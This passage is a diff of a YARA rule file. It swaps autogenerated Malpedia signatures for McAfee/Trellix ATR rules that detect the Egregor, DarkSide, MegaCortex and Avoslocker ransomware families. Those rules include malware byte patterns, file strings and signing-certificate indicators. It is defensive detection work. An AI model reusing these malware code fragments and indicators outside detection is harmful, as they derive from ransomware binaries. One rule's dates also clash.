"https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + hash = "5f9fcbdf7ad86583eb2bbcaa5741d88a" + logic_hash = "8077c656eed0b1633da54f8d017d4eff122f2f4e486c4e1af6f6434ea33c0675" score = 75 - quality = 75 - tags = "FILE" - version = "1" - tool = "yara-signator v0.6.0" - signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20231130" - malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" - malpedia_license = "CC BY-SA 4.0" - malpedia_sharing = "TLP:WHITE" + quality = 70 + tags = "RANSOMWARE, FILE" + rule_version = "v1" + malware_type = "ransomware" + malware_family = "Ransom/Egregor" + actor_type = "Cybercrime" + actor_group = "egregor" strings: - $sequence_0 = { 8d8dbcf9ffff 3985b4f9ffff 8b85a0f9ffff 7306 8d85a0f9ffff 51 50 } - $sequence_1 = { 391d???????? 0f84a4000000 8d75d4 e8???????? 68???????? 50 c645fc01 } - $sequence_2 = { 51 c745fc00000000 ffd3 85c0 7507 e8???????? eb0c } - $sequence_3 = { 6800400000 8d8c2494000000 51 ff15???????? 85c0 7526 8b8c2498400000 } - $sequence_4 = { 762a 56 e8???????? 8d0445fc6c4400 8bc8 } - $sequence_5 = { 89564c 895e44 6a08 b9???????? } - $sequence_6 = { eb14 807a2100 740a 3935???????? 7302 8bd1 } - $sequence_7 = { 3d00010000 752d 837c241c00 7626 } - $sequence_8 = { e9???????? 8d9580f9ffff 52 b801000000 898d84f9ffff 898d88f9ffff 6a02 } - $sequence_9 = { 8bd1 8b09 eb03 8b4908 80792100 74e6 5f } + $p1 = "ewdk.pdb" fullword ascii + $p2 = "testbuild.pdb" fullword ascii + $s1 = "M:\\" nocase ascii + $s2 = "1z1M9U9" fullword wide + $s3 = "C:\\Logmein\\{888-8888-9999}\\Logmein.log" fullword wide condition: - 7 of them and filesize <638976 + uint16(0)==0x5a4d and filesize <2000KB and hash.sha256(pe.rich_signature.clear_data)=="b030ed1a7ca222a0923a59f321be7e55b8d0fc24c1134df1ba775bcf0994c79c" or (pe.sections[4].name==".gfids" and pe.sections[5].name==".00cfg") and ( any of ($p*) or 2 of ($s*)) } -rule MALPEDIA_Win_Snatchcrypto_Auto : FILE +rule TRELLIX_ARC_RANSOM_Darkside : RANSOMWARE FILE { meta: - description = "autogenerated rule brought to you by yara-signator" - author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "8e680a41-0fdc-5ac7-bc9f-3f795f28f0bb" - date = "2023-12-06" - modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.snatchcrypto" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.snatchcrypto_auto.yar#L1-L134" - license_url = "N/A" - logic_hash = "276b735298fc8584b98457d3cb267661e785fa3122c696ae64ba4741a5859a9d" + description = "Rule to detect packed and unpacked samples of DarkSide" + author = "Marc Rivero | McAfee ATR Team" + id = "ecbee92f-236a-5385-9566-502ef1c0aeda" + date = "2020-08-11" + modified = "2023-07-27" + reference = "https://github.com/advanced-threat-research/Yara-Rules/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Darkside.yar#L1-L23" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + logic_hash = "be16d65911336809be103ea667167228e6445de85fd47ecd9ff8b3d91e056693" score = 75 - quality = 75 - tags = "FILE" - version = "1" - tool = "yara-signator v0.6.0" - signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20231130" - malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" - malpedia_license = "CC BY-SA 4.0" - malpedia_sharing = "TLP:WHITE" + quality = 70 + tags = "RANSOMWARE, FILE" + rule_version = "v1" + malware_type = "ransomware" + malware_family = "Ransom:W32/DarkSide" + actor_type = "Cybercrime" + actor_group = "Unknown" + hash1 = "9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297" strings: - $sequence_0 = { 7528 488bd3 488bcf e8???????? 448b87a8020000 488d15d43f0200 448906 } - $sequence_1 = { 4c8d442430 e8???????? 85c0 0f8533010000 8d7058 8d6814 eb36 } - $sequence_2 = { ff15???????? 488bf8 4885c0 750f ff15???????? 488d15f7730200 eb27 } - $sequence_3 = { 0fb74348 ff4320 448b4b20 ffc0 488d1586a70200 440fb7c0 e8???????? } - $sequence_4 = { 48894598 4889442458 4889442460 0fb6474d 41c1e608 440bf0 0fb6474e } - $sequence_5 = { 440fb64c3580 4c8d05a73f0100 ba03000000 488bcf e8???????? 48ffc6 4883c702 } - $sequence_6 = { 4883ec38 ffca 744c 81faff1f0000 754b 33c0 4c8905???????? } - $sequence_7 = { e8???????? 8bf8 85c0 7907 b8c0feffff eb3f 0fb78394030000 } - $sequence_8 = { 83c702 3ac1 760a b8bafeffff e9???????? 7368 0fb78b94030000 } - $sequence_9 = { 488d15e98d0200 498bce 4c8bc0 e8???????? 8d7e3e 448be3 e9???????? } + $pattern_0 = { CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC558BEC5053515256570FEFC0660FEFC033DB8B7D088B450C33D2B910000000F7F185C0740B0F110783C7104885C075F585D27502EB5892B908000000F7F185C0740B0F7F0783C7084885C075F585D27502EB3B92B904000000F7F185C0740A891F83C7044885C075F685D27502EB1F92B902000000F7F185C0740B66891F83C7024885C075F585D27502EB02881F5F5E5A595B585DC20800558BEC5053515256578B750C8B7D088B451033D2B910000000F7F185C074110F10060F110783C61083C7104885C075EF85D27502EB6892B908000000F7F185C074110F6F060F7F0783C60883C7084885C075EF85D27502EB4592B904000000F7F185C0740F8B1E891F83C60483C7044885C075F185D27502EB2492B902000000F7F185C0740E66891F83C60283C7024885C075F285D27502EB048A1E881F5F5E5A595B585DC20C00558BEC53515256578B4D0C8B75088B7D1033C033DBAC8AD8C0E80480E30F3C0072063C09770204303C0A72063C0F7702045780FB00720880FB09770380C33080FB0A720880FB0F770380C35766AB8AC366AB4985C975BE6633C066AB5F5E5A595B5DC20C00558BEC53515256578B75088B7D0C55FCB2808A0683C601880783C701BB0200000002D275058A164612D273E602D275058A164612D2734F33C002D275058A164612D20F83DB00000002D275058A164612D213C002D275058A164612D213C002D275058A164612D213C002D275058A164612D213C074068BDF2BD88A03880747BB02000000EB9BB80100000002D275058A164612D213C002D275058A164612D272EA2BC3BB010000007528B90100000002D275058A164612D213C902D275058A164612D272EA568BF72BF5F3A45EE94FFFFFFF48C1E0088A06468BE8B90100000002D275058A164612D213C902D275058A164612D272EA3D007D000083D9FF3D0005000083D9FF3D8000000083D1003D8000000083D100568BF72BF0F3A45EE9FEFEFFFF8A064633C9C0E801741783D1028BE8568BF72BF0F3A45EBB01000000E9DDFEFFFF5D2B7D0C8BC75F5E5A595B5DC20800558BEC53515256578B7D088B450CB9FF00000033D2F7F185C074188BD868FF00000057E8AD00000081C7FF0000004B85DB75EA85D274075257E8970000005F5E5A595B5DC20800558BEC5351525657B9F0000000BEB2B640008B45088B108B58048B78088B400C89540E0C89440E08895C0E04893C0E81EA101010102D1010101081EB1010101081EF1010101083E91079D533D233C98B750C33DB8B7D108A81B2B6400002141E02D08AA2B2B64000438882B2B6400088A1B2B640003BDF7306FEC175DAEB0633DBFEC175D25F5E5A595B5DC20C00558BEC535152565733C0A3C2B84000A3C6B84000B9400000008D35B2B640008D3DB2B74000F3A58B7D088B15C2B840008B4D0C8B1DC6B840004F33C0029AB3B740008A82B3B740008AABB2B740008883B2B7400088AAB3B7400002C5478A80B2B74000FEC23007FEC975D18915C2B84000891DC6B840005F5E5A595B5DC2080053515256578D35047040008D3DCAB84000FF76FC56E891FEFFFF56E8864500008BD8FF76FC56E888FBFFFF8B46FC8D3406B915000000E85C010000AD5056E868FEFFFF56E85D4500008BD8FF76FC56E85FFBFFFF8B46FC8D3406B93D000000E833010000AD5056E83FFEFFFF5256E8334500008BD85AFF76FC56E834FBFFFF8B46FC8D3406B915000000E808010000AD5056E814FEFFFF5256E8084500008BD85AFF76FC56E809FBFFFF8B46FC8D3406B904000000E8DD000000AD5056E8E9FDFFFF5256E8DD4400008BD85AFF76FC56E8DEFAFFFF8B46FC8D3406B906000000E8B2000000AD5056E8BEFDFFFF5256E8B24400008BD85AFF76FC56E8B3FAFFFF8B46FC8D3406B901000000E887000000AD5056E893FDFFFF5256E8874400008BD85AFF76FC56E888FAFFFF8B46FC8D3406B903000000E85C000000AD5056E868FDFFFF5256E85C4400008BD85AFF76FC56E85DFAFFFF8B46FC8D3406B901000000E831000000AD5056E83DFDFFFF5256E8314400008BD85AFF76FC56E832FAFFFF8B46FC8D3406B902000000E8060000005F5E5A595BC3ADFF76FC56E80AFDFFFF515653E8F743000059ABFF76FC56E8FFF9FFFF8B46FC8D34064985C975D8C3558BEC81EC1401000053515256578D85ECFEFFFF50FF1516B940008BB5F0FEFFFF8BBDF4FEFFFF83FE05750583FF01720583FE057313B8000000005F5E5A595B8BE55DC3E9DA00000083FE05751883FF017513B8330000005F5E5A595B8BE55DC3E9BD00000083FE05751883FF027513B8340000005F5E5A595B8BE55DC3E9A000000083FE06751785FF7513B83C0000005F5E5A595B8BE55DC3E98400000083FE06751583FF017510B83D0000005F5E5A595B8BE55DC3EB6A83FE06751583FF027510B83E0000005F5E5A595B8BE55DC3EB5083FE06751583FF037510B83F0000005F5E5A595B8BE55DC3EB3683FE0A751485FF7510B8640000005F5E5A595B8BE55DC3EB1D83FE0A750583FF00770583FE0A760EB8FFFFFF7F5F5E5A595B8BE55DC3B8FFFFFFFF5F5E5A595B8BE55DC3558BEC83C4F853515256576A0068800000006A026A006A006800000040FF7508FF1526B940008945FC837DFCFF74226A008D45F850FF7510FF750CFF75FCFF1536B9400085C07409FF75FCFF153EB940005F5E5A595B8BE55DC20C008BFF558BEC5351525657837D0C0074728D3DAABA4000837D100075086A1057E842F8FFFFFF750CFF750868EFBEADDEFF15F6B84000FF750CFF750850FF15F6B840003107FF750CFF750850FF15F6B84000314704FF750CFF750850FF15F6B84000314708FF750CFF750850FF15F6B8400031470CB8AABA40005F5E5A595B5DC20C00B8000000005F5E5A595B5DC20C00558BEC5351525657FF7508FF15DEB8400083C4048BD88D045D02000000506A00FF35AEB64000FF15BEB940008BF085F67434FF750856FF15CEB8400083C4088D43016A006A0050FF75086AFF566A006A00FF1506BA4000566A00FF35AEB64000FF15C6B940008BC35F5E5A595B5DC2040053515657833DBABA400000750B68BABA4000FF15F2B8400068BABA4000FF15F2B840008BD15F5E595BC3558BEC5351525657BB080000008B7508E8C1FFFFFF83FB05750433C033D28944DEFC8954DEF84B85DB75E55F5E5A595B5DC204008D4000558BEC81EC0001000053515256578D45B083C00F83E0F089850CFFFFFF8D8560FFFFFF83C00F83E0F0898508FFFFFF8D8510FFFFFF83C00F83E0F0898504FFFFFF837D14000F84750300008BB504FFFFFF0F57C00F11060F1146100F1146200F1146308B75088BBD0CFFFFFF0F10060F104E100F1056200F105E300F11070F114F100F1157200F115F30837D1440732A8B4510898500FFFFFF8B9504FFFFFF8BFA8B750C8B4D148A440EFF88440FFF4985C975F389550C8955108BB50CFFFFFF8BBD08FFFFFF0F10060F104E100F1056200F105E300F11070F114F100F1157200F115F305556BD0A0000008B078B5F108B4F208B57308BF003F2C1C60733DE8BF303F0C1C60933CE8BF103F3C1C60D33D68BF203F1C1C61233C68907895F10894F208957308B47148B5F248B4F348B57048BF003F2C1C60733DE8BF303F0C1C60933CE8BF103F3C1C60D33D68BF203F1C1C61233C6894714895F24894F348957048B47288B5F388B4F088B57188BF003F2C1C60733DE8BF303F0C1C60933CE8BF103F3C1C60D33D68BF203F1C1C61233C6894728895F38894F088957188B473C8B5F0C8B4F1C8B572C8BF003F2C1C60733DE8BF303F0C1C60933CE8BF103F3C1C60D33D68BF203F1C1C61233C689473C } + $pattern_1 = { 70211F3B6E97C50000473D000000A000004602003EBBFF1F92CC558BEC5053515256570FEFC0660333DBFBFFEDFF8B7D088B450C33D2B9100000F7F185C0740B0F110783C710480A692EFB7F75F585D27502EB5892B9081C7F08B60F592E3B040A891F38049B641979F61F02661CD6FEBFEC023802881F5F5E5A595B585DC25D977E20634F8B750C9110110F1006252383FD94C61097EF6819AC59BA226F7F089DEFD8EE0119450F8B1E82C604A23E033232F1240EC602B9EC91C1A5F2048A1EA70CA12CCBD9A64D757D42E9FEFFBFAC8AD8C0E80480E30F3C0072063C09770204303C0A090FB66F6DBB5780FB140804150380C3300C0ADADFFE790F5766AB8AC3034985C975BE6646FF252CD6096564610C55FCB2806FDF86DB8A069701887801BBAD0299058A164FD62EFB4612D273E60A4F430C0F83DB7F2A7B602613C00A74068BDF2BD821EC63DB8A03644762EB9BB80142900BFBFB72EA2BC3BB1C7528B923C96F7FFB1F568BF72BF5F3A45EE94D01D248C1E008C3468BE8DE1EC26E0C0449303D007D4B83D9FF0DD93CD907058000D100BDB01BF250F04C33C974017417B1D8B0B61902561B96204B06E1C25D2B398BC75208111AEE18EDB9FF2660F4F8EFDDF7188BD8680E579B03D981C70B4B85DB75EAEE94CD5EFE7407521546B9F0256F7F6BB7BE02A6B24D50108B58048B7807400C895FF7FFDB540E03440E08895C0E04893C0E81EA10002D048168ED9FB1EB05EF83E91079D57EC0DFFFFDE4EC80108A814A02141E02D08AA20A436BFFBFDF88820688A1053BDF7306FEC175DAEB062C076E0B29A3D227F8A327A8C27DFBEDFE04C6B940998D35378D3D05A7B2F3A57DBC8FF7F31520B41D242A9A1BFB8DDD1CB38A8205AB28888305AA11D88DFFFE02C5478A800EFEC23007FEA0D189402F9684D8893D0D7C6BF07BF8CF6004A8CAFF76FC5630040549FF33FFDBAC59109C0C8B46FC8D3406B9150F477291BD05F0AD50283D52C252D961295A532A02B902BB04550608B902B90103E10843260299C3AD8615B2BF2751565333F959AB329FE0EEF874D8C33F81EC1468C885ECFE7777DFF0FFFF50FF4FA9168BB5F00C8BBDF40583FE055877F74BA483FF017205097313B86D00695BF36DFA8BE55DC36C073C2118751C3300D21C210234DF04D2FD06751785FF1B3C1555109AC11EC8B83DEB6A19023EA419644250033FC866DE2636690A75141864FECDEE4C1DDE00770A760EB8FFFFFF7F1B927C490DFF3083C4AEFD7A84F82D6A0068976A02080AFE8FB07509405A083B268945FC837DFCFF7422916D73DF188D45F85072020C1DFC34ECB0AE3672090C3E59746B43DACC8BFFCE3C0D7472E1AD44FB51AAAA0B04576A1057BC67BF3F16470868EFBEADDE3FA8F6105090BDB0670C31070E47040F92F50EC9080CB8624E071B5913D85CD6A8DE6D1FDF6AF9E4D88D045D6D50DAFF58F78F7D63AEC6BE8BF085F6743429562ADDDCE1CBCE088D430119FDBDFF56B027ECEF0A1AAA065639C68BC37077FB9C630484FAF4BAF10B6807A31DB0B14CF20A8BD12DE09A3871989ABBFD24E84013CB376608A783FB048DD2D90317B87FDEFC87DEF8C4E55D49C628308D17EE000DC32FF145B083C027E0F089850CE3FD202387B960051108102B99FE37040B7D14000F8475C41E0FA6DBC5F60F571C119846100320ED17EF8930B1BD4EB0104E17D32CDBCB1056105E3026074F57CDE6E26E5F304840732AE457008B6FF017BF954D8BFAFB4D148A3FFF88447B6DFBD30FFFA3F389550C02106E5359FDF0A964085556BD0A14078B5F6FFFDFBE354F208B5792F003F2C1C60733DE8BF303F0080933CEED2FFFF28BF103F30D33D68BF203F11233C68907892ECBB26D96898947143A243404CBD612202F3B24342CCBB22C0428380818CBB25C802838081820CBB22C3C0C1C2CDFB22C173C0C1C2CED0463476063760CED04750C53606363ED187510ED18D80863637510ED2C6424ED3036C2142C6524ED30234C818D6538ED3065386DA30DFC4D85ED0F851B975E5DF30702CBE5726BC80357105F1867206FB6022F972877307F380F0C024EE572B9DC1EFE56FE5EFE66FE6EA6D996CBFE76FE7E7F3D7F7F94A6699A7F7F7F7F7F9AE5C8708D6B5757575D8C966B57BED8FE2011BFE4B834118B9DA7274320837B2086F1B195000824E977EF1866C335DB32C500E4B2BD154E8B55BA338942200524B5655BFA24EB16831940030C6D370297C0237485CAFC86C21297EE1A818880308D7D80F3B920B16FE21DF2F3ABB900DF518D7580F810CD33E7FED1168D7604E2F92175128B06194DA6ECED078D7F17F473181911C9600933C441290CD5BB0A5B5B59F033E476B05505E00CEDAA9BBDB266E03AA5D908A6BFB960DDDFFCDD4FE0C64580018BA98F7EF05D0C81C379B981A849B1BE07D84150F8510851FC8DAB8360115F547B8D626FADBB1D508D3B50E874D3815240D3E0BF6563F02203740F9908199BBB4B1961646306AE9B780C830627307DC7E63041B73BDB06F8410ECB8A369391B8D51A68A41F000B8278E2C406CE1F0926023676729008AA12F80C1A24446B4B22170E54206317F226F8C37EF45B18B8C3F8EF238B71C65E4E62F475F8F46A0514066C737F01CE04EB43EB3F3D310A1B1CB5D84CD837C2EBC60D2C5A839117A1C12C4468F7BBA5196AD2C86AD6616CDBD8288E2E33ED3CAD1D14C3999178FF733C02CA74D72E71A1A14402EBFC1C332275D4565858CA5D4F846D35570F06E6AC62895FE9BF454B183B480875278D1F30AABEC220586C3BEA0F2C3A0E186BD5E850C63826070017E40793C5F30C0262CC0D776B110D6F68081017F4FDDD58B2C77568040110976256A3D8B3C4B2CC11D3D23DE2DB4636F677FC57FB571F34102048BC03A1088DA3ADD5456CD8C2BE227A30C3A3B18D922A9B1C2C6A9BDB095B62106E38E18B5E12C37BD86CB0403753132F6E56A573B367B10FBC59A8EE97CD409E848530675464A1183064849F924030C31A2C72E1248313F88D1DCF6C125B166CECFC53EC531BB519E4027936286BC0D263936C0F6A245FD4C70B24B15766738C09E89B4A2C585392A89C53325426816407AA7E5111040C8D9913E810EF52A937B527344930AA660C5E017648727CC960E3F07304ADA50B27ACDB8F2D60F0B5833EAF15107A641F05D019EBCCCBACDD2578763D4FA9744A4A0FFC0618E9E3147A6517C1293AECB517D9F88B122E0146336C2CD67D7C5224760B1D0E08506FC8096E7ACA96504FB6B1B1463FD3A6521911F424E1FC5A0142A91AD9A722EC3EEE6B18B26B1C3D7DB1D75EAFFC8D7531831C8535BF8E68EB803FAA5219367958D984534FBE3C1B690664B0B03CCC09209966A401B44050C83336C9ECA29D0004D88465B109215A244576CF58C96AF0346AF4AE9D3DB360BC0E3989C005A9247508F153A7A564036F644553F675A3D4253BAC3956120C5AEBE66EC682D922722568F4C058B36FD730DAEDB57D14450DAA0BD716168151969EAE69921D76C8D85E08626E130C9C11C00D07C160C7846481EDFF72C8A1BDE3DF9F813C18DEADBEEF980340EBF2C631F9EC4E04136DA456A4A1FC8EAC7E73C8C1E0068BD82373CCBB46C6DE01B16A1630408086A44CB2810B2C2F3616500A17F3DE5F0BAB8EAEA556561FFBE5B2F6150A374D358D83E6070A67B303593A5A56223D5A89E4C8254EB60FE492B3D95E56223D5E4FD9EC447286176256223D223972C96250561FB9E46C766656223D6641363B911C26276A56223D488E5C726A51F62E72362B90C7223D6E9D488E5C52C6367256472E399B223D724B963E9CCD4E247656223D7627922397537E427A56964BCE66223D7A545890672269727E72CCA759E47E0AC8A912678203C11A01B23557FBC2E08A53D968243106BE91ACB86472A8C319698152773D833C038C907C420BB3345B061008091C095EE251887010EBDE251B5A160CE0FD66B80904A10B9566ABE74C161266A4D19EE614ECA72DE3F8DC0F84A129461DF421D89E3DE828139F83DA062D4FEEF350ECD3AEFCF6EB6399F833D285D255B390DB6BFDC90530940107A842EB14BB162E2CC12B8B1BD4CB4D33C9192BFFAE400830040E4183F9080E04AC5F713904576A57014C7042E2C8681122C63664F381D8ED9E70B470B8182C883DA58E0EFFE62C080B5B180C256C469348D2C1B408AC1CEC840704300A44AA0EBBB6044381DC0C4BA62EEA1D487CDA4AE10E58D4DC194871F43A5F5DB37064FBF086F034798B83C9A26B096057B0571E7F83172666FD47FE5CFA66C704475C00D565F15702444702D9EB3D62598B151A11EA0B3531B614F06592BA0E46348A5D3932DAC81B1A386C90410C03802C26E0B1CCCD19502B1B035C4379AA3ACD09D534968523BBEB6953CCECBFEC511DB68B27C8F4CB75EC39326FD94ED2820BEB1E27F41821E12E7548293B02750759AC12C23B9616FF57C6082997A5EC1C846C4EC80C6D026D0630968DE46D06251CA43358A41AF84F9CD06CEBA91B5C107EDA562CE1F7C049A5AE83702B0CCB523367A364CD46000B08DD35AD8C91877A08E63C5798CC25C3AC9C86AD927DC615A3A3DC53E7CA217946B6431A1010E864489E911414F0183891906718F8A44D6148561EEBA0D3363ACC9DD08BC8C45110BA36D092BA42CE140510960626A37C49D0736C658C67F0524156E89E609103 } condition: - 7 of them and filesize <1400832 + $pattern_0 or $pattern_1 and filesize <5831344 } -rule MALPEDIA_Win_Dexter_Auto : FILE +rule TRELLIX_ARC_RANSOM_Darkside_DLL_May2021 : RANSOM FILE { meta: - description = "autogenerated rule brought to you by yara-signator" - author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5ebe4c09-da98-582c-8eed-df32a16fd066" - date = "2023-12-06" - modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dexter" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dexter_auto.yar#L1-L115" - license_url = "N/A" - logic_hash = "88383a20a07c3308fad4494ea352148cf37f604e3e0c05d6e635ee453d38e768" + description = "Rule to detect Darkside Ransomware as a DLL" + author = "TS @ McAfee ATR" + id = "e9d64637-dc8f-5650-81e1-34e27e6ee912" + date = "2021-05-14" + modified = "2023-07-27" + reference = "https://github.com/advanced-threat-research/Yara-Rules/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Darkside.yar#L26-L47" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + hash = "f587adbd83ff3f4d2985453cd45c7ab1" + logic_hash = "39930b6f352642647ea6b80f941201b93d6a9defd42cb75f9e4f7239ff17a4ec" score = 75 - quality = 75 - tags = "FILE" - version = "1" - tool = "yara-signator v0.6.0" - signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20231130" - malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" - malpedia_license = "CC BY-SA 4.0" - malpedia_sharing = "TLP:WHITE" + quality = 70 + tags = "RANSOM, FILE" + rule_type = "Public" + rule_version = "v1" + malware_type = "Ransom" strings: - $sequence_0 = { 8b5508 83c201 895508 8d45f4 } - $sequence_1 = { c705????????00000000 a1???????? 0305???????? 8945fc 8b4d0c } - $sequence_2 = { eb17 837df400 7511 6a01 e8???????? } - $sequence_3 = { 50 e8???????? 83c410 8b4df8 51 6a00 8b15???????? } - $sequence_4 = { 7507 b801000000 eb0d 8b4dfc 83c101 } - $sequence_5 = { 52 6a00 ff15???????? 68???????? 68???????? } - $sequence_6 = { e8???????? 83c404 0fbed8 c1e304 } - $sequence_7 = { 68e8030000 ff15???????? e9???????? 833d????????00 741e 8b0d???????? } - $sequence_8 = { 8b5510 8a45f9 8802 8b4d10 83c101 } - $sequence_9 = { 8b0d???????? 51 ff15???????? 6aff 8b15???????? } + $s1 = "encryptor2.dll" wide ascii + $s2 = "DisableThreadLibraryCalls" wide ascii + $s3 = "KERNEL32.dll" wide ascii + $pattern1 = {D24DC8855EDD487B3CD2D545F11031E1FA85C2F2440712445F67D105B326533A77BA75B3383A98CE97EAA2B95798DCFA6B75B5573662F9ED5DC9B7D2E582FD94104E210F3EA62A1826B26B952FFBD5A70A97E6EC3D14794577A2980A0ED1EE02CA291623DD3721A7E68223EDA56F9E1325FE36E191D5C41F7227D55EDC3D5B9359C819} + $pattern2 = {87FC982E066F585B73D417C0D5F75B86B9F9F8286B4CC42BB2053912D595A68C07C0EDD0159AC785880C5483E246D3501F6523D05078B9B7510711423948D4CB367C83C0833BD04AD6DC655E1BEEA38770470BB48B6EBA70944E952526E4D87A03BAA485D7B4DA1318A00EF07FA76C0D} + $pattern3 = {1B6F099F1C3C62BBF5543FA03B919C7BF5E477D256CE79D98C55ACE8D69CDC9373B2F0A2B51414776D5226B74BF9A7CB935C9DD04BCFC19FC81418F7A39244A730697E1BC05418BF41DE50E4C8609533591CE80617D476E686B36CF2AE914CB3AFD720A33C0D5DE438F1CD0B} + $pattern4 = {5060E373F1D3B3BB8D15C851BBFC73F60390681C488F7C0B80FC2EDBC1ED88CEA82014B9223A70EA0BB7DD0D2560A29D39381FEE7B73AE22683AE05C369918F8C5772678A9F29CEF65854238D1C2B762CC12706637154F57A9} + $pattern5 = {EE452560DBD5A4F46FB562C9C707C8D014BB8F1C18E4467E249F5AC69A87954F5B69650B7A759CE2DD075E99CBCBA37A9C5A0650EDF06285F8F990AF6B94FBA08E3C0B2EBDE3C155ECDB06C30F95D76695} condition: - 7 of them and filesize <98304 + filesize >=45KB and filesize <=70KB and all of ($s*) and 4 of ($pattern*) } -rule MALPEDIA_Win_Avzhan_Auto : FILE +import "pe" + +rule TRELLIX_ARC_Megacortex_Signed : RANSOMWARE FILE { meta: - description = "autogenerated rule brought to you by yara-signator" - author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ae24c209-0bbe-565c-a4e8-dc5e113ea302" - date = "2023-12-06" - modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.avzhan" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.avzhan_auto.yar#L1-L121" - license_url = "N/A" - logic_hash = "e5753cf0528c1786d65aca4559b3855c06a602b71f8830b1dc3d077867894002" + description = "Rule to detect MegaCortex samples digitally signed" + author = "Marc Rivero | McAfee ATR Team" + id = "78a74e30-4de0-5e63-8ca5-31251c296f98" + date = "2024-09-01" + modified = "2020-08-14" + reference = "https://blog.malwarebytes.com/detections/ransom-megacortex/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_MegaCortex.yar#L3-L26" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + logic_hash = "8ffced3aca837682fbd7ee68f559f73b8299cbfbe198f48124c4857680735249" score = 75 - quality = 75 - tags = "FILE" - version = "1" - tool = "yara-signator v0.6.0" - signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20231130" - malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" - malpedia_license = "CC BY-SA 4.0" - malpedia_sharing = "TLP:WHITE" - - strings: - $sequence_0 = { f3aa 8b3d???????? 833d????????01 7418 } - $sequence_1 = { 75e8 6a14 ff15???????? 833d????????01 75d2 } - $sequence_2 = { 8bf0 8dbc2404020000 83c9ff 33c0 83c408 f2ae } - $sequence_3 = { 68???????? 51 ff15???????? 8b2d???????? 8b1d???????? b910000000 } - $sequence_4 = { 8d442464 52 50 e8???????? 83c404 50 e8???????? } - $sequence_5 = { 6a00 6a00 6a00 6a00 6a00 8d8c2418020000 6a00 } - $sequence_6 = { 83c408 f2ae f7d1 6a00 51 8d8c2404020000 51 } - $sequence_7 = { 8bc3 83c408 c1e010 668bc3 8b1d???????? c1e902 } - $sequence_8 = { 6a00 51 6a00 ffd5 85c0 } - $sequence_9 = { 51 8d842484010000 52 50 } + quality = 70 + tags = "RANSOMWARE, FILE" + malware_type = "ransomware" + malware_family = "Ransom:W32/MegaCortex" + actor_type = "Cybercrime" + actor_group = "Unknown" condition: - 7 of them and filesize <122880 + uint16(0)==0x5a4d and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "/C=GB/L=ROMFORD/O=3AN LIMITED/CN=3AN LIMITED" and pe.signatures[i].serial=="04:c7:cd:cc:16:98:e2:5b:49:3e:b4:33:8d:5e:2f:8b" or pe.signatures[i].subject contains "/C=GB/postalCode=RM6 4DE/ST=ROMFORD/L=ROMFORD/street=8 Quarles Park Road/O=3AN LIMITED/CN=3AN LIMITED" and pe.signatures[i].serial=="53:cc:4c:69:e5:6a:7d:bc:36:67:d5:ff:d5:24:aa:4b" or pe.signatures[i].subject contains "/C=GB/postalCode=RM6 4DE/ST=ROMFORD/L=ROMFORD/street=8 Quarles Park Road/O=3AN LIMITED/CN=3AN LIMITED" or pe.signatures[i].serial=="00:ad:72:9a:65:f1:78:47:ac:b8:f8:49:6a:76:80:ff:1e") } -rule MALPEDIA_Win_Byeby_Auto : FILE +import "pe" + +rule TRELLIX_ARC_Ransom_Avoslocker : FILE { - meta: - description = "autogenerated rule brought to you by yara-signator" - author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "74fc8a87-5c7b-524e-8e78-621f0d855f26" - date = "2023-12-06" - modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.byeby" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.byeby_auto.yar#L1-L122" - license_url = "N/A" - logic_hash = "ea138eeca75e1ffbb323be9c4364fb51ef613b1a9fd77855f97073778ad7174f" + meta: + description = "Rule to detect Avoslocker Ransomware" + author = "CB @ ATR" + id = "50f029c8-154e-583d-8264-8d86d01075f6" + date = "2021-07-22" + modified = "2021-07-22" + reference = "https://github.com/advanced-threat-research/Yara-Rules/" + source_url = 